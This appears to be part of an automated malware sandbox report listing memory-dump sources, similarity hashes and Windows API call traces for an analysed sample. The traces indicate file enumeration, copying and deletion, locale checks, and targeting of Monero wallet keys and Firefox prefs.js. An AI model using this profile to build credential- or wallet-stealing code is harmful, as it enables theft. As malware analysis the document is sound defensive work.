                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s$%s\%s$%s\*
                        • API String ID: 180737720-445461498
                        • Opcode ID: bd00ffae60240f6ffd80612f50b185dda78bcbcfefb52adfe0cbf436d1d14f1a
                        • Instruction ID: e7af09bcc0e978bf090a0b3b81245dfb338b62147468584e5292ac1bf5f4bf98
                        • Opcode Fuzzy Hash: bd00ffae60240f6ffd80612f50b185dda78bcbcfefb52adfe0cbf436d1d14f1a
                        • Instruction Fuzzy Hash: 156153B1900218ABCB24EBA0DC45EFB777DBB89700F04869DB50996141EF75EB85CFA1
                        APIs
                        • GetProcessHeap.KERNEL32(00000000,0098967F), ref: 006A4580
                        • RtlAllocateHeap.NTDLL(00000000), ref: 006A4587
                        • wsprintfA.USER32 ref: 006A45A6
                        • FindFirstFileA.KERNEL32(?,?), ref: 006A45BD
                        • StrCmpCA.SHLWAPI(?,006B0FC4), ref: 006A45EB
                        • StrCmpCA.SHLWAPI(?,006B0FC8), ref: 006A4601
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006A468B
                        • FindClose.KERNEL32(000000FF), ref: 006A46A0
                        • lstrcat.KERNEL32(?,0126F990), ref: 006A46C5
                        • lstrcat.KERNEL32(?,0126E650), ref: 006A46D8
                        • lstrlen.KERNEL32(?), ref: 006A46E5
                        • lstrlen.KERNEL32(?), ref: 006A46F6
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
                        • String ID: %s\%s$%s\*
                        • API String ID: 671575355-2848263008
                        • Opcode ID: 043cd72f4514dac950dcd8e43a98f3bb18d1b4269a799074034739b689a6f334
                        • Instruction ID: 78c2baba4b163057d7d3b1660accaa0486bf134a0ce68c5b62cff82a339c8907
                        • Opcode Fuzzy Hash: 043cd72f4514dac950dcd8e43a98f3bb18d1b4269a799074034739b689a6f334
                        • Instruction Fuzzy Hash: 7C5164B1900218ABCB64FBB0DC89FEA737DBB59300F404699F60996150EF74DB848F91
                        APIs
                        • wsprintfA.USER32 ref: 006A3EC3
                        • FindFirstFileA.KERNEL32(?,?), ref: 006A3EDA
                        • StrCmpCA.SHLWAPI(?,006B0FAC), ref: 006A3F08
                        • StrCmpCA.SHLWAPI(?,006B0FB0), ref: 006A3F1E
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 006A406C
                        • FindClose.KERNEL32(000000FF), ref: 006A4081
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\%s
                        • API String ID: 180737720-4073750446
                        • Opcode ID: 66a5df0586b550f48f8ec3ca08b46a5caeb49aa5409b0b53d6705b2aeee30cf4
                        • Instruction ID: 7340711d45537928c68b28568ad0fa737948d98c5aa643446a137ccb8e4546d9
                        • Opcode Fuzzy Hash: 66a5df0586b550f48f8ec3ca08b46a5caeb49aa5409b0b53d6705b2aeee30cf4
                        • Instruction Fuzzy Hash: 545164B2900218ABCB24FBB0DC85EFA737DBB45300F00469DB65996150EB75EB85CF95
                        APIs
                        • wsprintfA.USER32 ref: 0069ED3E
                        • FindFirstFileA.KERNEL32(?,?), ref: 0069ED55
                        • StrCmpCA.SHLWAPI(?,006B1538), ref: 0069EDAB
                        • StrCmpCA.SHLWAPI(?,006B153C), ref: 0069EDC1
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0069F2AE
                        • FindClose.KERNEL32(000000FF), ref: 0069F2C3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Find$File$CloseFirstNextwsprintf
                        • String ID: %s\*.*
                        • API String ID: 180737720-1013718255
                        • Opcode ID: 2953c5a68a0ef6b6f7fef7c1ccbcbdc753dbeaeab935c7099b068255bcdabbe5
                        • Instruction ID: 502f5b7172d0d6fee96857b944c4b31eacfaa5d7d66d16dd799ac695809d33f3
                        • Opcode Fuzzy Hash: 2953c5a68a0ef6b6f7fef7c1ccbcbdc753dbeaeab935c7099b068255bcdabbe5
                        • Instruction Fuzzy Hash: CCE1DF729121189ADBD4FBA0DC52EEE737AAF55300F40419EB50B62092EF346F8ACF55
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006B15B8,006B0D96), ref: 0069F71E
                        • StrCmpCA.SHLWAPI(?,006B15BC), ref: 0069F76F
                        • StrCmpCA.SHLWAPI(?,006B15C0), ref: 0069F785
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0069FAB1
                        • FindClose.KERNEL32(000000FF), ref: 0069FAC3
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID: prefs.js
                        • API String ID: 3334442632-3783873740
                        • Opcode ID: 9ec18d8b93a9ff7ec5e9b97c26a4b84cf916b524fd4a764bc84f7fb016818d4b
                        • Instruction ID: b5cfb7fe95220b7486b933b468c914af5e9bc576d49a8229cb698dacd42630bf
                        • Opcode Fuzzy Hash: 9ec18d8b93a9ff7ec5e9b97c26a4b84cf916b524fd4a764bc84f7fb016818d4b
                        • Instruction Fuzzy Hash: E3B155719001089FDBA4FFA0DC55AEE737AAF55300F5085ADA40A9B181EF34AF49CF96
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006B510C,?,?,?,006B51B4,?,?,00000000,?,00000000), ref: 00691923
                        • StrCmpCA.SHLWAPI(?,006B525C), ref: 00691973
                        • StrCmpCA.SHLWAPI(?,006B5304), ref: 00691989
                        • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00691D40
                        • DeleteFileA.KERNEL32(00000000), ref: 00691DCA
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 00691E20
                        • FindClose.KERNEL32(000000FF), ref: 00691E32
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                        • String ID: \*.*
                        • API String ID: 1415058207-1173974218
                        • Opcode ID: dc2d03a51294fbd0edf0e4531a2a6fabe507ecfa1161819637e540b2f6eddb22
                        • Instruction ID: 4590a6f180c5d970f91ed2f9f884bf90e52b299b138b8368a9b92afdcafce5ed
                        • Opcode Fuzzy Hash: dc2d03a51294fbd0edf0e4531a2a6fabe507ecfa1161819637e540b2f6eddb22
                        • Instruction Fuzzy Hash: BE122F719111189BCB99FBA0CC96AEE737EAF56300F40419EB10B66091EF346F89CF95
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,006B0C2E), ref: 0069DE5E
                        • StrCmpCA.SHLWAPI(?,006B14C8), ref: 0069DEAE
                        • StrCmpCA.SHLWAPI(?,006B14CC), ref: 0069DEC4
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0069E3E0
                        • FindClose.KERNEL32(000000FF), ref: 0069E3F2
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                        • String ID: \*.*
                        • API String ID: 2325840235-1173974218
                        • Opcode ID: 9497d0647876501bc0566cce13a547f30c024979cf84abd0ba8f1f4b557210cf
                        • Instruction ID: 97e306da83b2f053052211ba3f9f5359877d8f625f41c78f706a5c3ef73b0f61
                        • Opcode Fuzzy Hash: 9497d0647876501bc0566cce13a547f30c024979cf84abd0ba8f1f4b557210cf
                        • Instruction Fuzzy Hash: 23F1BF718211189ADB99FBA0CC95EEE737ABF15300F9141DEA40B62091EF346F8ACF55
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                          • Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
                          • Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982
                          • Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,012691F0,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
                          • Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
                          • Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12
                          • Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905
                        • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,006B14B0,006B0C2A), ref: 0069DAEB
                        • StrCmpCA.SHLWAPI(?,006B14B4), ref: 0069DB33
                        • StrCmpCA.SHLWAPI(?,006B14B8), ref: 0069DB49
                        • FindNextFileA.KERNEL32(000000FF,?), ref: 0069DDCC
                        • FindClose.KERNEL32(000000FF), ref: 0069DDDE
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                        • String ID:
                        • API String ID: 3334442632-0
                        • Opcode ID: e5f900633ed296fc8c68f260862ee12e4a1fe4b99b600d06030c1680d2063ecf
                        • Instruction ID: 7bd7b2892b88e5096c86f20271a7a03531cb09ccee7981c95898d67505d543d7
                        • Opcode Fuzzy Hash: e5f900633ed296fc8c68f260862ee12e4a1fe4b99b600d06030c1680d2063ecf
                        • Instruction Fuzzy Hash: 729131B69001049BCF94FBB0DC569EE737EAB85300F40866DA90A96581EF34DF09CF96
                        APIs
                          • Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788
                        • GetKeyboardLayoutList.USER32(00000000,00000000,006B05AF), ref: 006A7BE1
                        • LocalAlloc.KERNEL32(00000040,?), ref: 006A7BF9
                        • GetKeyboardLayoutList.USER32(?,00000000), ref: 006A7C0D
                        • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 006A7C62
                        • LocalFree.KERNEL32(00000000), ref: 006A7D22
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                        • String ID: /
                        • API String ID: 3090951853-4001269591
                        • Opcode ID: 486f66aa988d463a4beb118401144ac0a63dc29537c7a08a0b995883c6531686
                        • Instruction ID: 9afe05209da1bbacd802bf43d1a79a7ef6d73c84d75ad9bf90d54c034276e93c
                        • Opcode Fuzzy Hash: 486f66aa988d463a4beb118401144ac0a63dc29537c7a08a0b995883c6531686
                        • Instruction Fuzzy Hash: A3417171941118AFDB64EB94DC99BEEB379FF45700F2042DAE40A62281DB342F85CFA5
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000772000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.00000000008DA000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000A78000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B54000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B74000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B7D000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116800161.0000000000B8C000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117648949.0000000000B8D000.00000080.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117757470.0000000000D27000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2117772943.0000000000D28000.00000080.00000001.01000000.00000003.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_690000_file.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: !.\~$Vmo$X%_y$`C>;$d_Pr$rW$zrnN
                        • API String ID: 0-4162817629
                        • Opcode ID: c5bd542d0c2430c20bea1ec1240cf8bb2be2378e55a0d8f390fb7c43d90f2704
                        • Instruction ID: 26f6f0c4e5727713ad90eaa08112a1919768671472cb4125a76a5603025dc3cc
                        • Opcode Fuzzy Hash: c5bd542d0c2430c20bea1ec1240cf8bb2be2378e55a0d8f390fb7c43d90f2704
                        • Instruction Fuzzy Hash: 49B238F3A082109FE304AE2DEC8567ABBE9EFD4720F16853DEAC5C7344E93558058796
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2116800161.00000000008EE000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true
                        • Associated: 00000000.00000002.2116097013.0000000000690000.00000004.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000691000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.0000000000741000.00000040.00000001.01000000.00000003.sdmp
                        • Associated: 00000000.00000002.2116121170.000000000074D000.00000040.00000001.01000000.00000003.sdmp
